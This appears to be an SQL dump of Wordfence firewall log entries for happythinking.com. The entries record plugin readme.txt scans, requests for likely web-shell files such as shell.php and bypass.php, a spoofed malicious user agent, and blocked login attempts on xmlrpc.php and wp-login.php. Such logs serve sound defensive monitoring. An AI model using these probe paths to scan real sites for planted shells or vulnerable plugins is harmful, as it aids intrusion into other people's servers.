(51663, 1712367980.320023, 1712367979.633600, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/webapp-builder/readme.txt', NULL, 'Mozilla/5.0 (Linux; Android 10; HD1913) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.101 Mobile Safari/537.36 EdgA/120.0.2210.157', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93ZWJhcHAtYnVpbGRlci9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93ZWJhcHAtYnVpbGRlci9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(51643, 1712367599.971027, 1712367599.574300, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/mobile-friendly-app-builder-by-easytouch/readme.txt', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9tb2JpbGUtZnJpZW5kbHktYXBwLWJ1aWxkZXItYnktZWFzeXRvdWNoL3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9tb2JpbGUtZnJpZW5kbHktYXBwLWJ1aWxkZXItYnktZWFzeXRvdWNoL3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(51644, 1712367599.970731, 1712367599.574300, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/mobile-friendly-app-builder-by-easytouch/readme.txt', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9tb2JpbGUtZnJpZW5kbHktYXBwLWJ1aWxkZXItYnktZWFzeXRvdWNoL3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9tb2JpbGUtZnJpZW5kbHktYXBwLWJ1aWxkZXItYnktZWFzeXRvdWNoL3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(51662, 1712367962.413855, 1712367961.988100, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/genesis-simple-defaults/readme.txt', NULL, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/67.0.3372.0 Safari/537.36', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9nZW5lc2lzLXNpbXBsZS1kZWZhdWx0cy9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9nZW5lc2lzLXNpbXBsZS1kZWZhdWx0cy9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(51645, 1712367597.532797, 1712367597.132600, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/jssor-slider/readme.txt', NULL, 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/115.0.5826.212 Chrome/115.0.5826.212 Safari/537.36', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9qc3Nvci1zbGlkZXIvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9qc3Nvci1zbGlkZXIvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(51646, 1712367597.532445, 1712367597.132600, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/jssor-slider/readme.txt', NULL, 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/115.0.5826.212 Chrome/115.0.5826.212 Safari/537.36', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9qc3Nvci1zbGlkZXIvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9qc3Nvci1zbGlkZXIvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(51624, 0.000000, 1712366413.997490, '\0\0\0\0\0\0\0\0\0\0ÿÿ´÷Rb', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51585, 1712338986.894229, 1712338986.619600, '\0\0\0\0\0\0\0\0\0\0ÿÿ§GÜ¦', 0, 403, 0, 0, 0, 'https://happythinking.com/dropdown.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Ryb3Bkb3duLnBocA==","category":"brute-force","ssl":1}'),
(51617, 1712359377.983730, 1712359377.630700, '\0\0\0\0\0\0\0\0\0\0ÿÿ§GÜ¦', 0, 403, 0, 0, 0, 'https://happythinking.com/css.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nzcy5waHA=","category":"brute-force","ssl":1}'),
(51584, 1712338988.898258, 1712338988.588600, '\0\0\0\0\0\0\0\0\0\0ÿÿ§GÜ¦', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-seo.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLXNlby5waHA=","category":"brute-force","ssl":1}'),
(51627, 1712367528.666931, 1712367528.003900, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/pie-register/readme.txt', NULL, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:115.0) Gecko/20100101 Firefox/115.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9waWUtcmVnaXN0ZXIvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9waWUtcmVnaXN0ZXIvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(51614, 1712359384.845039, 1712359384.394800, '\0\0\0\0\0\0\0\0\0\0ÿÿ§GÜ¦', 0, 403, 0, 0, 0, 'https://happythinking.com/shell.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NoZWxsLnBocA==","category":"brute-force","ssl":1}'),
(51588, 1712338981.365194, 1712338980.942000, '\0\0\0\0\0\0\0\0\0\0ÿÿ§GÜ¦', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/x/index.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy94L2luZGV4LnBocA==","category":"brute-force","ssl":1}'),
(51615, 1712359382.707631, 1712359382.324900, '\0\0\0\0\0\0\0\0\0\0ÿÿ§GÜ¦', 0, 403, 0, 0, 0, 'https://happythinking.com/bypass.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2J5cGFzcy5waHA=","category":"brute-force","ssl":1}'),
(51587, 1712338983.777427, 1712338983.371000, '\0\0\0\0\0\0\0\0\0\0ÿÿ§GÜ¦', 0, 403, 0, 0, 0, 'https://happythinking.com/epinyins.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2VwaW55aW5zLnBocA==","category":"brute-force","ssl":1}'),
(51616, 1712359380.091074, 1712359379.711500, '\0\0\0\0\0\0\0\0\0\0ÿÿ§GÜ¦', 0, 403, 0, 0, 0, 'https://happythinking.com/simple.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(51586, 1712338985.347574, 1712338985.049300, '\0\0\0\0\0\0\0\0\0\0ÿÿ§GÜ¦', 0, 403, 0, 0, 0, 'https://happythinking.com/admin.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FkbWluLnBocA==","category":"brute-force","ssl":1}'),
(51625, 0.000000, 1712366962.974575, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51626, 1712367528.667519, 1712367528.003900, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/pie-register/readme.txt', NULL, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:115.0) Gecko/20100101 Firefox/115.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9waWUtcmVnaXN0ZXIvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9waWUtcmVnaXN0ZXIvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(51580, 1712338345.495742, 1712338345.211500, '\0\0\0\0\0\0\0\0\0\0ÿÿ§GÜ¦', 0, 403, 0, 0, 0, 'https://happythinking.com/new/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L25ldy93cC1hZG1pbi9pbnN0YWxsLnBocA==","path":"L25ldy93cC1hZG1pbi9pbnN0YWxsLnBocA==","category":"discovery-and-probing","ssl":1}'),
(51581, 1712338342.526895, 1712338342.235800, '\0\0\0\0\0\0\0\0\0\0ÿÿ§GÜ¦', 0, 403, 0, 0, 0, 'https://happythinking.com/wp/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwL3dwLWFkbWluL2luc3RhbGwucGhw","path":"L3dwL3dwLWFkbWluL2luc3RhbGwucGhw","category":"discovery-and-probing","ssl":1}'),
(51582, 1712338992.023644, 1712338991.695900, '\0\0\0\0\0\0\0\0\0\0ÿÿ§GÜ¦', 0, 403, 0, 0, 0, 'https://happythinking.com/xxc.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3h4Yy5waHA=","category":"brute-force","ssl":1}'),
(51669, 1712367987.260982, 1712367986.967100, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp2android-turn-wp-site-into-android-app/readme.txt', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cDJhbmRyb2lkLXR1cm4td3Atc2l0ZS1pbnRvLWFuZHJvaWQtYXBwL3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cDJhbmRyb2lkLXR1cm4td3Atc2l0ZS1pbnRvLWFuZHJvaWQtYXBwL3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(51635, 1712367543.406836, 1712367543.030900, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/chatbot-chatgpt/readme.txt', NULL, 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/68.0 Mobile/15E148 Safari/605.1.15', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9jaGF0Ym90LWNoYXRncHQvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9jaGF0Ym90LWNoYXRncHQvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(51583, 1712338990.470139, 1712338990.125100, '\0\0\0\0\0\0\0\0\0\0ÿÿ§GÜ¦', 0, 403, 0, 0, 0, 'https://happythinking.com/wb.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3diLnBocA==","category":"brute-force","ssl":1}'),
(51623, 0.000000, 1712364642.598501, '\0\0\0\0\0\0\0\0\0\0ÿÿ´÷Rb', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51618, 1712359375.873376, 1712359375.574200, '\0\0\0\0\0\0\0\0\0\0ÿÿ§GÜ¦', 0, 403, 0, 0, 0, 'https://happythinking.com/atomlib.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2F0b21saWIucGhw","category":"brute-force","ssl":1}'),
(51620, 0.000000, 1712361518.326346, '\0\0\0\0\0\0\0\0\0\0ÿÿ1‘mè', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51621, 0.000000, 1712362087.073285, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51622, 0.000000, 1712364526.343583, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51619, 0.000000, 1712359637.809106, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51633, 1712367530.875001, 1712367530.460400, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/create-block-theme/readme.txt', NULL, 'Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/122.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9jcmVhdGUtYmxvY2stdGhlbWUvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9jcmVhdGUtYmxvY2stdGhlbWUvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(51670, 1712367987.260736, 1712367986.967100, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp2android-turn-wp-site-into-android-app/readme.txt', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cDJhbmRyb2lkLXR1cm4td3Atc2l0ZS1pbnRvLWFuZHJvaWQtYXBwL3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cDJhbmRyb2lkLXR1cm4td3Atc2l0ZS1pbnRvLWFuZHJvaWQtYXBwL3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(51634, 1712367543.407212, 1712367543.030900, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/chatbot-chatgpt/readme.txt', NULL, 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_7_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/68.0 Mobile/15E148 Safari/605.1.15', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9jaGF0Ym90LWNoYXRncHQvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9jaGF0Ym90LWNoYXRncHQvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(50297, 1711080778.735803, 1711080778.451600, '\0\0\0\0\0\0\0\0\0\0ÿÿ›…\Z)', 0, 403, 0, 0, 0, 'https://www.happythinking.com/atomlib.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2F0b21saWIucGhw","category":"brute-force","ssl":1}'),
(50409, 1711259709.609037, 1711259709.266300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ÿ/', 0, 403, 0, 0, 0, 'https://happythinking.com/simple.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
